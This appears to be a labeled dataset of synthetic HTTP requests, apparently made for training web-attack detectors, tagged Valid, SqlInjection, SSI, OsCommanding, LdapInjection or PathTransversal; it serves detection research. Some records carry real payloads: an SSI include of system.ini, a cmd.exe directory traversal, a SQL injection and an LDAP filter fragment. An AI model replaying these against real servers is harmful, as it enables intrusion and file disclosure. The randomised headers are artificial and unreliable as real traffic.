Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.3, deflate;q=0.3, deflate, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 12.173.29.154
Cookie: 0x9ws9see=2268705;ehlozti=enwjaq;hE4mhrcnhmsa=wlR;r1Detneon=o xAuu pw4 mr;OplZ1htpass=9Sz
Cookie2: $Version="7"
Date: Thu, 25 Sep 08 17:16:50 CET
ETag: W/"Sqjh.u1yWvsvoj2HqDQT"
Expect: 100-continue
From: 0nut6lE@tkmeBmrt.org
If-Modified-Since: Thu, 28 Oct 04 06:08:08 UTC
If-Unmodified-Since: Wed, 16 May 07 02:29:08 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic ZG9lUmE6ZW1ld2M=
Authorization: Digest nonce
Range: 759-,636-76717
Referer: /kpneetY/wHoct6/omrhona.nsf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.6 (compatible; MSIE 4.7; Open BSD i386; nh5isknruI; Dur4; strup)
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8293x354
Via: 5.6 www.iesenqeK.html
Transfer-Encoding: renho; y7ddan=doioot
Upgrade: yyiKl/3.7, it7/7.9, ehn/2.1
Warning: 105 220.45.75.184:10 "ytobtcpe0cmlaiagf7in" "Sun, 01 Jan 06 03:01:20 CET"
X-Forwarded-For: 243.148.157.212
X-Serial-Number: 900444
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21251
Start - Id: 37326
class: LdapInjection
GET /nkpuseeoraelhatr/db4NR/if11pLsg4xQhtqGATVv/h_WznRGO/cin/aiavsttum2e/da/Z7havingw8CXYl/t59N@xPO1sexc@.xGUED/Eu3DUH4I5o3ir0/CMZ5iP8/v@vZBRwfmns5d9.pl? HTTP/1.1
Host: www.Wswenuud.it
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.5, iso-8859-2, big5, euc-jp, x-mac-ce;q=0.4
Accept-Encoding: 
Accept-Language: bet)( |    (l0i=*)
Cache-Control: only-if-cached
Client-ip: 30.6.248.166
Cookie: 0lWcmn=wnn86;B6wZ=eu2t;Gnmrhcmmthc=3123892;vtef=3670075;Llao5n6d=shPzMGVI6W_
Cookie2: $Version="51"
Date: Thu, 23 Oct 08 17:18:15 CET
ETag: "98VQaYC9N.W5V.CpbpHX"
Expect: ahws
From: ddtp@lesT.org
If-Modified-Since: Mon, 15 Nov 04 22:08:26 UTC
If-Unmodified-Since: Fri, 11 Jul 08 06:48:56 CET
If-Match: "R_t2Fy4Z0mJmZ55fW"
If-None-Match: *
If-Range: *
Max-Forwards: 554
MIME-Version: 9.0
Pragma: uocoeH=t
Proxy-Authorization: dy7k pgiy=6bvq
Authorization: NTLM ZGRvdGVvaGFhMHh2THJFcXJUc3doaW5VZHNpcjBkNjFkdG1laW1uYWll
Range: 1-568088,6956-8,075-
Referer: http://www.Cmwi.net/jpoigtld.mpeg
TE: gzip,gzip;q=0.9,trailers
Trailer: Range
User-Agent: Mozilla/6.3 (compatible; Konqueror/9.7; Open BSD i386; tneelhaeiN; roarEej; rhAqmrp)
UA-CPU: x86
UA-Disp: 2661,0577,16
UA-OS: FreeBSD
UA-Color: color16
Via: 3.6 www.ael1.html, HTTP/3.3 125.108.79.142, FTP/5.8 7.198.157.18
Transfer-Encoding: identity
Upgrade: OO7l/1.1
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 71.227.252.82
X-Serial-Number: 06549032
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37326
Start - Id: 20528
class: Valid
GET /rv0azol27o/servicesjaPw6Uh._qTK6/tQw93MYzcGY5R8@v/hJFk9abFlCb5T.htm? HTTP/1.0
Host: www.aeon17.com:69114
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 109.69.212.119
Cookie: EBdrRliriw6fab=aetycoDmno;vwiee=hrmar;ce8niusp=23312764;lEieidaate5oe3S=9r8-8qDNKVfx;8r=329889;ci1wemHrAdi=2610367930
Cookie2: $Version="88"
Date: Sun, 03 Apr 05 11:50:30 UTC
ETag: W/"H9HATn4wvtevWS-kYLzg"
Expect: t1la=2usu
From: m4Ilxlpt@rise1wePl.it
If-Modified-Since: Tue, 23 Dec 08 10:58:24 UTC
If-Unmodified-Since: Tue, 19 Feb 08 07:45:45 UTC
If-Match: "OI_UCKcSwJQ0LV9ts6"
If-None-Match: *
If-Range: Wed, 24 Sep 08 07:25:27 CET
Max-Forwards: 711
MIME-Version: 6.1
Pragma: rtTn1ew='idetswu'
Proxy-Authorization: NTLM bkVoSWFhbXRWcjlrZXlyaWVlbGdobG9lckl0ZW43ZTFzZWxlcjdmM2lob2l2ZXBP
Authorization: Digest opaque="wrot0"
Range: 922388-,667-,-2130
Referer: /Shot/eaeyxrs/acnikot/tk8le.avi
TE: trailers
Trailer: From
User-Agent: rsffea2tufhidoe
UA-CPU: StrongARM
UA-Disp: 650,0186,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5447x066
Via: ryed5o/0.6 128.155.43.246, FTP/6.2 www.nvtua.js
Transfer-Encoding: identity
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 678 www.dRoc.jpeg "lAdokerhfgTnsaoGeu" 
X-Forwarded-For: 55.186.171.144
X-Serial-Number: 48113953855
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20528
Start - Id: 40531
class: SSI
GET /40iaanag24cotreeearg.cfm?nieetna=boa%3F%3Ataesq&oohthit=lyabaefmp&@atelnetQ=%3C%21--%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&fJ8vf6=%2Bedi5Sr%40tc&tEdpyetsie9f=8308&iwomqikwpZ7sog=r%40dWSbE74L&tjacwecepM=7ebhg-tyi+&esNhwdyxrlm=gopen2aStn71d0aofuf&rlrEnscmtc=ivt&haaaEltjsnnn4d=esenlhrWn26ontltn HTTP/1.1
Host: www.lTcniteheE.net
Connection: close
Accept: video/mpeg, audio/*, audio/*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: tyh5jIs-stwR, XepA-agjeae;q=0.8, o4at-tut;q=0.0, adwHwy-vrrE, vmti-spT
Cache-Control: max-age=54074
Client-ip: 233.63.57.74
Cookie: pt7-.78nservicesA=udqueakezEo9saem;eEeAhhmstnetlnT=bq6;ai2tsri=weZs;oe4hidTw=ehttpsktk;6ofu=nt~
Cookie2: $Version="59"
Date: Thu, 25 Feb 10 14:08:13 UTC
ETag: "ubCoWZOLfAI2Q57h"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Wed, 06 Sep 06 02:09:16 CET
If-Unmodified-Since: Sun, 20 Nov 05 09:41:55 GMT
If-Match: ".F048NzyNjE88MVs"
If-None-Match: *
If-Range: Sat, 16 Jun 07 06:14:22 UTC
Max-Forwards: 7
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM OXJ3bGd1ZWFnZWVTbnRzMHhpT3dlYmI2bzZweXR0TGY=
Authorization: Basic ZGNhdG50bzpzQW9lZXJ5bw==
Range: -52,238-2637
Referer: /thz0gchH/veps/rete.png
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 0.5; te-ls; rv:4.2.7) Gecko/83872607
UA-CPU: MIPS
UA-Disp: 5153,3619,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1239x334
Via: FTP/3.2 www.entebte9.jpg:779
Transfer-Encoding: deflate
Upgrade: 26c/9.8
Warning: 706 www.8omhtse.shtml "seeiifggsn7jjfoai" "Fri, 07 Dec 07 06:30:57 GMT"
X-Forwarded-For: 93.190.193.214
X-Serial-Number: 61054598804485092045
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40531
Start - Id: 44470
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 73.128.212.127
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-8-i, x-mac-turkish, iso-10646-ucs-2
Accept-Encoding: deflate;q=0.6, deflate
Accept-Language: *;q=0.8
Cache-Control: min-fresh=6358
Client-ip: 1.111.16.222
Cookie: sasni=0;2gCbr1niisf=cEGXIc4;dndDieyehnPey=fbssteNrxtermAiet;qr.passwdLFR=olecsAgsetraiy;rhst=386658
Cookie2: $Version="32"
Date: Tue, 19 Dec 06 12:37:55 UTC
ETag: "9tG0dVXV9Y0RyLYk3AXZ"
Expect: gnetsmnu=tlaou;tnr3Ia5i=Cmw8
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 01 Dec 04 09:54:12 UTC
If-Unmodified-Since: Thu, 28 Oct 04 01:11:51 CET
If-Match: "nTPMIixCYYawxKeXCE"
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: *
Max-Forwards: 8
MIME-Version: 3.4
Pragma: 7pYecmhh='arng'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest uri=/sDrliAx/dimpbdtr/ftpeho5/Oeripi7x.php4
Range: 6-02287,72753-
Referer: http://www.dat7fe.uk/7rltet/mr8w/zdoNpt1t/Acroba/g0eha.mdb
TE: chunked;q=0.7,trailers,trailers
Trailer: Accept-Language
User-Agent: eZuoii5tx/9.7.8
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: eoennr/7.4, 8ld/4.6
Warning: 731 100.170.76.46 "ehlcumeiuEsibidnig" "Sat, 04 Sep 04 07:51:46 UTC"
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44470
Start - Id: 22924
class: Valid
GET /iwBir64/rAQwqO2@CMl@XgN/b6/ieo6ncn1bErtndiif.gif?NzSpgV=riconnectolikehmanrshutdownd&h7Th8tbswroPabT=TU&ds2otre=eueo&ze0meoj2yit=ihongrnbehtzsb&ideae3amoolrst=nedteogqihhd4i3&1lirAjn0e=57&fa=ajluooaTx&ia2if1elttntdn=fs%3ArAihoadoiha&oOe3rhhthdt1=dani&feiitwEzcar=v%25nkooa HTTP/1.0
Host: www.8xarOtad.it
Connection: ost6
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ost8ltt-h8tigN, i7i-htndsh
Cache-Control: no-store
Client-ip: 52.65.72.52
Cookie: objectfAjSTsock_stream3=fdbi6ltmog1;a2ooedhsiiFebra=wR-y;Yt=2o3;fnejkeMxm2r=lzh5e;tcazoneo26hsgts=656;nesqn5oa=7
Cookie2: $Version="3"
Date: Fri, 29 Oct 04 08:34:21 UTC
ETag: W/"ql_v5j1v650snoaaoM"
Expect: 100-continue
From: sheeev0h@4urQEniSH.be
If-Modified-Since: Fri, 22 Sep 06 04:50:06 CET
If-Unmodified-Since: Sat, 01 Dec 07 06:22:31 CET
If-Match: "PC-Ra7YeCDqJKJl"
If-None-Match: "abuNdjiAr2Igixmy"
If-Range: Thu, 25 Dec 08 05:06:25 UTC
Max-Forwards: 90
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NMpAAn laOq=EeeCMt
Authorization: Digest response="1c695CaeD192aaeaAFF494D8B69a1d3A"
Range: 9849-,026-7220,-544798
Referer: http://www.ikstu9.ch/nn4isHys/vufhbere/0a5s/esswt.php3
TE: deflate;q=0.7
Trailer: Accept-Encoding
User-Agent: Mozilla/2.8 (compatible; Konqueror/7.9; Unix; yUaeow8i)
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 159x1338
Via: 6.7 231.123.190.131, HTTP/4.4 109.135.246.135
Transfer-Encoding: deflate
Upgrade: aHpmg/5.8, 48c/5.3
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 175.81.60.59
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22924
Start - Id: 11831
class: Valid
GET /rgtEaruonx/9js/JkcDndB-gt/t23/rj0s/Sdelete4o3_8ZoS0copy/rmlt/YW2Pe@dn2f93Y/ssInTmn/jiJFnCDR6C9d7ABI.ye.png?llellafraisKerb=%5Db&rioroEMouniia=tin%3Euhv&1g5cmm=et2a%7Cnl&eeh8tcOe=evclocation&eseldooji6avrog=nsptfadwoFe&qhRs6iyi=1&baakaetnaban=hbnaaa&iqi=cpl&wPeR-Jl7mtunione=porlioci2thO&HnJinclude@cp6s4qh=tcdsriinsertwget16ti%3Da%26da&WG=168381294&sremzey9rqlt=782264&oAsiribetmMte=%3Al%3FeE&7ERiF3Ale5jo=%3Dak5mCd4a%26%40 HTTP/1.0
Host: 119.171.225.22
Connection: keep-alive
Accept: image/png, video/*, image/*;q=0.3
Accept-Charset: ks_c_5601-1987, hz-gb-2312, iso-8859-6;q=0.5, iso-8859-15;q=0.1
Accept-Encoding: gzip;q=0.6
Accept-Language: *
Cache-Control: min-fresh=99966
Client-ip: 250.119.225.222
Cookie: erBrsoeligttbo=ne;childqLAjLWvarNcopyhaving=m9seet;mmfmlske=psens;Bsnyf=oEa~Tt40+de c;fuzk2J=a;tvyree=>s
Cookie2: $Version="845"
Date: Thu, 21 Dec 06 09:29:29 UTC
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: 100-continue
From: raeRsdn@ezgoodi.biz
If-Modified-Since: Tue, 10 Feb 04 17:07:53 GMT
If-Unmodified-Since: Mon, 08 Aug 05 22:38:13 GMT
If-Match: "4Shs6e4Rf2kmm1l"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM cndlYVQ0cmVvbnZyZWxyaW50dHRhaXJ0dGx2bnNhb21iaQ==
Authorization: Digest nc=f8da8099
Range: -9087,256-
Referer: http://xiha4.ch/eltnalue/ofaeT/y1mtyhaa.swf
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/3.4 (compatible; MSIE 2.7; Open BSD i386; iloomu; rtni0lbl)
UA-CPU: PowerPC
UA-Disp: 032,592,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.4 www.sgpv.css, 4.7 www.ia4rLot.js
Transfer-Encoding: gzip
Upgrade: ptl/3.8, ewttf/4.6, ywn/8.3
Warning: 779 www.runsnon.css "al5s6npNr3oe0Heo" "Sun, 08 Mar 09 02:18:33 CET"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 63208652767395
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 11831
Start - Id: 24412
class: Valid
GET /5ijoSsaloatarrutsne/r9dmLnr1Eceby/snxTwTMf/fc/gRrX3zw.GsHZmJp/eiMEJM9Vruwkrwy8/t6te/tes0r/mefpTsn/c7qcCjZPEM/r3HKJXwQmj0rVwPR/tsoenawAsuriaei0ivbm.jpg?ShDautoexecd5LiZ=ib%269sock_stream0nntecwolsuE&ASDS=tKKC%40G&QBIH9ru0iJ=7366&cSitbhrsfseea=3612340516&nagi=nhVdJ3F08Z&tmpvrcpevalMi=uAetg&aM6P=cojho HTTP/1.0
Host: www.4witsihcex.net:6
Connection: close
Accept: image/*, audio/basic, application/rtf;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 143.96.218.124
Cookie: yaostao=';@gBWTIketo_=45952426;bAiYyqgYsh=nno6srssl;itanihTteae0ns=eheteL4tL7
Cookie2: $Version="01"
Date: Sat, 17 Apr 10 06:03:32 GMT
ETag: W/"IWHI6.TkL9CDOaCCc1R"
Expect: 100-continue
From: EthrCsE2@rztsaatbaT.be
If-Modified-Since: Fri, 08 Aug 08 07:35:00 GMT
If-Unmodified-Since: Fri, 20 Feb 09 24:14:24 GMT
If-Match: *
If-None-Match: "aCa@-@uaG3MnjkqBUoLE"
If-Range: Thu, 31 Jul 08 01:26:41 GMT
Max-Forwards: 381
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="03f5CBdFe1b3b7aFaCeAB191f27Fe5e8"
Authorization: seise rsnsGa=syrtoha
Range: 61288-04731,214-935
Referer: /eIekaJo/7eodvbc.php3
TE: deflate,gzip
Trailer: Host
User-Agent: hzstqslhr (g9SWr2W; seg-DcuJ; 7-rMem; ljUtanCcI3)
UA-CPU: StrongARM
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1274x3966
Via: 3.7 113.64.167.236
Transfer-Encoding: identity
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 402 www.8iitaqp.shtml "eenh8nejpamwsHv" "Wed, 04 May 05 21:54:36 GMT"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 568060558126
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 24412
Start - Id: 41378
class: SqlInjection
POST /jdD7XYX/mmyar5hcAex/ER29@pde-14Jn5/4JhahhtEXPahg5h7tl/awi35azeees6nrT8/4nrUrQ.D@t_VlVzM1R0L/TqscriptjoXObQ/EAtd4ExtaOi6soilThsc/noyEi4vheqyeriDlnnNI.php? HTTP/1.0
Content-Length: 336
Content-Language: Esrb2
Content-Encoding: identity
Content-Location: /rumio/r9lul/2zSe/nemEo.msf
Content-MD5: cmg2aU9yT3RkdG50NGRxVQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 12:19:46 GMT
Last-Modified: Wed, 15 Mar 06 15:57:50 GMT
Host: 113.228.161.82
Connection: keep-alive
Accept: text/plain;q=0.1, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.5
Cache-Control: waT4b='zl'
Client-ip: 182.0.7.148
Cookie: C@PhEwIPA=804;eeaaaum=sUpiFerhce2ntqJhRw;ami6=tlzioAlayoynrcpske
Cookie2: $Version="30"
Date: Wed, 07 Apr 04 13:17:01 GMT
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Sun, 16 Oct 05 11:50:51 UTC
If-Unmodified-Since: Sat, 08 Jan 05 01:10:38 CET
If-Match: "i0lMN13R6YQQ4FIYKY"
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: -49879
Referer: http://www.thh1hi.st/Nxrye/Ceiwb.tiff
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: twiaA (awu6fOs; up0169y.; nyMqAisU)
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: HTTP/9.8 www.satzss.jpeg, 8.9 76.207.155.25:1, 1.7 212.253.176.243
Transfer-Encoding: deflate
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

qzGnaesa=c-mlpG&enoludnfnpymnd=sab&ndetNauti=wYscript&itp7iowledbysaO=+Mcriyposition$eogD@:&ieoos=53inph-V&acioRs2pONeeirt=flaHewimyfa&ue0t6a0t=0wlroawests&gtttSZrwa=8femeat&daa1aete=093173969&6mleeigndsrliq='    OR   'cmfbciu'     =     N'     &nitlnfaEotemfe= oz[t7w end7szl5rd&smie4niuaabn8=usiw&irx09f4epsnic=158

End - Id: 41378
Start - Id: 29759
class: Valid
GET /B6Nkrhpwindow.openasxEc3/eYE/g7mkhamFcny/nnxxkoStdrztholan.exe?onwMfaisCerqxf=9344&Ils2S=79&yBEdthsS01a=611925&c5ir4etaTxuITo=ts HTTP/1.0
Host: 108.173.15.226
Connection: dertrma
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.8, identity, identity;q=0.9, compress, identity;q=0.2
Accept-Language: yoreTsl-asCua;q=0.4, ntc-es;q=0.3, cijeihs-aaftl;q=0.5, ammraa-ueT7etl, ddkeno-didje;q=0.2
Cache-Control: av=M
Client-ip: 175.124.156.50
Cookie: 8dleEoehe=28;AnRtZQnnmDUG=xswalikejm=;lAnwwtLgotDh=acceptunnda
Cookie2: $Version="66"
Date: Fri, 15 Feb 08 05:38:20 CET
ETag: W/"AybKivuz6vrGDh10JTrV"
Expect: lehLi
From: blhdnuR@sEtt7.be
If-Modified-Since: Mon, 23 Feb 04 09:14:47 GMT
If-Unmodified-Since: Fri, 07 Nov 08 08:23:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.4
Pragma: S3r='aenoat'
Proxy-Authorization: NTLM dzA2bXRkdGVsb21zbnNzdjdld2lhVG5UcjZkc2I5RG4=
Authorization: Digest nonce
Range: 544462-8615
Referer: http://www.N5ce.be/esEt/dajafe.tar
TE: trailers,chunked;q=0.7
Trailer: Warning
User-Agent: Mozilla/5.9 (compatible; Konqueror/7.5; WinNT; haeihsery; sttnho8m3n)
UA-CPU: MIPS
UA-Disp: 045,174,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2347x796
Via: eil/5.7 61.243.26.10, 8.3 www.f8ceoine.gif, HTTP/6.7 www.ca57.jpg
Transfer-Encoding: gzip
Upgrade: i9y/2.0, idocae/0.1, xaekJa/4.4
Warning: 339 73.130.242.130:62488 "lUaiatecmaeewqtihoat" 
X-Forwarded-For: 150.107.9.100
X-Serial-Number: 55789
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29759
Start - Id: 26633
class: Valid
GET /hirQ.gif?wits6aatnuel=m+Gwnetcat+ HTTP/1.0
Host: www.sgc2.fr
Connection: close
Accept: */*
Accept-Charset: iso-8859-15, isiri-3342;q=0.3, windows-874, iso-8859-3, windows-1253;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=66592
Client-ip: 19.94.203.92
Cookie: lUb22OV=xk;W6HfepasswdWTQUh=hlhtteieelo7
Cookie2: $Version="82"
Date: Sun, 13 Apr 08 11:52:06 UTC
ETag: W/"xK2KPSsK0S8p@T34H"
Expect: tbhoee=orss
From: ceebh8z@anOtt1nhog.cz
If-Modified-Since: Sat, 30 Apr 05 03:58:58 GMT
If-Unmodified-Since: Fri, 15 Oct 04 15:53:50 UTC
If-Match: "vgH_H6At8Xix..HU"
If-None-Match: *
If-Range: "eo8S-GYoz@EyOQqb"
Max-Forwards: 212
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: qmaO 1o3rna0=oine
Authorization: hmtyd t0spe=gdEs
Range: 442029-,4-
Referer: http://tessec.com/tAha.css
TE: gzip;q=0.7,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/8.3 (X11; U; Open BSD i586 5.0; Nu-yy; rv:0.5.0) Gecko/66159401
UA-CPU: Sparc
UA-Disp: 080,9861,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: ieh/2.9 166.168.205.144:7832
Transfer-Encoding: gzip
Upgrade: iqeeh/8.0, lpstrb/3.7, 0ddrat/0.4, ieq/2.7, n5pdk/3.6
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 98.254.54.114
X-Serial-Number: 21651458708939157204
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26633
Start - Id: 7049
class: Valid
PUT /aG1ECM9Pj5imgi/c6rejidbendla/b@/teS6/6teesPeeadtPeetcuso/ttZ3atolrtuNir0trerc/g4DdkxgP/yuRJqsvkB_4WSn5/pv.jjvVR/lfyrt4Ego/lntAgnlh5egtass0tb.exe? HTTP/1.1
Content-Length: 96
Content-Language: hNetlVy7,stesookj
Content-Encoding: deflate
Content-Location: /temero.avi
Content-MD5: VXJtdG5zbmNydGFlckI4bg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jun 07 15:46:29 UTC
Last-Modified: Sun, 20 Jun 04 19:55:20 CET
Host: www.lmuthwodqr.de:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: noo-aieesl
Cache-Control: no-store
Client-ip: 121.9.140.63
Cookie: ttwlpL7rtnxsoh=maadH;ohoyeil=rid4ymo
Cookie2: $Version="137"
Date: Sat, 31 Dec 05 24:15:09 CET
ETag: "CCYMNETtXIRX-Ju7FoJ"
Expect: Ie0qh=eheg;feba=frrLit
From: 8Tenvio@teLzi4efd8.de
If-Modified-Since: Mon, 04 Feb 08 20:11:50 GMT
If-Unmodified-Since: Fri, 26 Sep 08 08:29:27 GMT
If-Match: *
If-None-Match: "FNf72OOAa6PVwbwRW"
If-Range: Wed, 16 Nov 05 21:36:55 GMT
Max-Forwards: 462
MIME-Version: 7.4
Pragma: 5='bNpod'
Proxy-Authorization: av6on gevp5=fEhrwh
Authorization: NTLM Y3NuYXk3T25tcG9uMW9ucmVkbm5Tb210bnRha25zYmFuZWh0b2pwcmpleHl3bWk=
Range: -8,-8,0-
Referer: http://znrun4.cz/octehsr/gybcy.pl
TE: chunked;q=0.5,deflate;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 0.3; 80-mC; rv:1.2.1) Gecko/24413007
UA-CPU: Sparc
UA-Disp: 4109,8794,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8498x1908
Via: 0.9 www.rPem.html:212
Transfer-Encoding: deflate
Upgrade: I2ti/2.8, auou/8.8, qzqset/3.8
Warning: 083 170.246.141.163 "Eoeoetconodpehi" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 484018235309
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

Rsnw9oyetso7Lzj=incdyetAytt&dtdo1nsp1ua0b=hq9p0sCzB6Vw&Eei2i=dUeFtZp1&svdr=n.n7L8nSW&y2=02939502

End - Id: 7049
Start - Id: 2956
class: Valid
GET /5d0LI_fYmts/t8KX8l/TlrWqGWy3q/uXD/brElehrnmI.asp?h.-PvKfnjNinput=utner6rfetme&oOebdh.WrR=648&Tiiou=w%3Euwau%40hp+tqh8v%25nl%5DT&nddd8loonrA3at=a0&pnnP=n&eqm=+i&iF59ehi5wl=fromso&iwah=%40lywinnt%2B HTTP/1.0
Host: www.thwsvs.fr
Connection: aedi
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.4, compress;q=0.1, gzip
Accept-Language: vd-6ofa8se;q=0.0
Cache-Control: no-store
Client-ip: 210.193.164.44
Cookie: Ie=tc;LEAX.rcpY_p=iw5dktrjtnrmegobject<ne;rtk2ioprougorzF=e3etcoe;6peojbtpiGf=neESoea;dtkwpNe=objectdtto
Cookie2: $Version="496"
Date: Mon, 09 Nov 09 08:46:48 CET
ETag: "kqymBXwIb4BDZBZzH"
Expect: ljhh
From: Iohco@rBgrnzg.net
If-Modified-Since: Thu, 23 Sep 04 18:52:56 GMT
If-Unmodified-Since: Wed, 21 Oct 09 09:51:47 UTC
If-Match: *
If-None-Match: *
If-Range: "qaOY.1dd9XUz9G26HUt"
Max-Forwards: 163
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="si4s"
Authorization: NTLM bmlsZTVyOGlsdGV3UmN3Mm9FZTRoZXN1bG5maXVwdTlpcmdyb2w2ZW9vY2pmbQ==
Range: -6,9249-18
Referer: /atsa/eetEr7ty/urnmoe/cdEotnE/sfifsdim.jpg
TE: chunked
Trailer: Date
User-Agent: nprthevgaa/6.7.9.1.7
UA-CPU: StrongARM
UA-Disp: 088,2412,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8247x2505
Via: HTTP/1.3 www.a6e9u.jpg, 5.2 209.196.173.146
Transfer-Encoding: deflate
Upgrade: l4ait5/5.0, alsllu/3.2
Warning: 679 121.176.212.56 "aajSEEaaS9ry" "Wed, 04 Oct 06 05:54:46 CET"
X-Forwarded-For: 245.87.13.55
X-Serial-Number: 1920071
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2956
Start - Id: 35928
class: PathTransversal
PUT /imgi2hL/9-HGcbSpT/K6Yk01tq_58/hm9Hn@HCVO2/qwYFD_NZiIU/on59ao/oZlZhP.pl? HTTP/1.1
Content-Length: 351
Content-Language: dia,dnos
Content-Encoding: deflate
Content-MD5: ZWljZU9yYmRvZGVpbnNpcg==
